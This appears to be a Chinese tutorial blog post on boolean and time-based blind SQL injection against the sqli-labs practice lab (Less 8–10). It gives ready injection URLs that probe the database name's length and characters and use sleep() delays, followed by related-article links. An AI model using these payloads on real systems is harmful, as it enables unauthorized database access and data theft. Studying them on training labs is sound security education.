小课堂 -- 时间​​盲注和Bool盲注

简介: 小课堂 -- 时间​​盲注和Bool盲注

环境sqli-labs

 

less 8

一、通过判断是单引号闭合

http://192.168.1.119/sqli/Less-8/?id=1' --+

二、我们查询一下数据库有多少字节

http://192.168.1.119/sqli/Less-8/?id=1' and LENGTH(database())>=8 --+

三、判断数据库的第一个和第二个字母是s、e(ascii码是115,101)

http://192.168.1.119/sqli/Less-8/?id=1' and ascii(substr(database(),1,1))>=115 --+

http://192.168.1.119/sqli/Less-8/?id=1' and ascii(substr(database(),2,1))>=101 --+

 

Less 9

因为不管我们怎么输入,返回的都是同样的信息,但是我们又想知道是否存在注入,我们通过sleep(5)延时来判断是否成功执行了sql语句

一、如果报错婷5秒

http://192.168.1.119/sqli/Less-9/?id=1’ and sleep(5) --+

二、如果数据库名的第一个字母是s停留5秒

http://192.168.1.119/sqli/Less-9/?id=1’ and if(ascii(substr(database(),1,1))>=115, 0, sleep(5)) --+

 

Less 10

同上,只是由单引号变为双引号

一、如果报错婷5秒

http://192.168.1.119/sqli/Less-10/?id=1” and sleep(5) --+

二、如果数据库名的第一个字母是s停留5秒

http://192.168.1.119/sqli/Less-10/?id=1" and if(ascii(substr(database(),1,1))>=115, 0, sleep(5)) --+

 

禁止非法,后果自负

目录
相关文章
|
6月前
|
数据库
15、延时布尔盲注(Post)
15、延时布尔盲注(Post)
46 0
|
6月前
|
关系型数据库 MySQL Linux
【MySQL-10】数据库函数-案例演示【字符串/数值/日期/流程控制函数】(代码演示&可cv代码)
【MySQL-10】数据库函数-案例演示【字符串/数值/日期/流程控制函数】(代码演示&可cv代码)
【MySQL-10】数据库函数-案例演示【字符串/数值/日期/流程控制函数】(代码演示&可cv代码)
|
6月前
|
数据库
基于时间盲注
基于时间盲注
47 2
|
6月前
|
数据库
小课堂 -- 延时布尔盲注(Post)
小课堂 -- 延时布尔盲注(Post)
40 0
|
XML SQL 安全
[NPUCTF2020]ezlogin (xpath盲注)
[NPUCTF2020]ezlogin (xpath盲注)
163 0
|
存储 数据库
laravel-admin 查询过滤时间戳(数据库使用int类型)不起作用案例复现及解决办法
laravel-admin 查询过滤时间戳(数据库使用int类型)不起作用案例复现及解决办法
278 0
laravel-admin 查询过滤时间戳(数据库使用int类型)不起作用案例复现及解决办法
|
小程序 编译器 C++
C++菜鸟学习笔记系列(19)——返回类型和return语句
C++菜鸟学习笔记系列(19)——返回类型和return语句
245 0
|
存储 关系型数据库 MySQL
一文速学-玩转MySQL时间运算函数以及时间匹配操作详解+实例代码
一文速学-玩转MySQL时间运算函数以及时间匹配操作详解+实例代码
270 0
一文速学-玩转MySQL时间运算函数以及时间匹配操作详解+实例代码
【工具】基于时间和布尔的注入原理与sqlmap的使用
进阶一下,我们看看盲注是如何操作的·。
143 0
|
SQL 数据库 开发者
时间盲注
延迟注入,是一种盲注的手法, 提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注.SQLMAP。
444 0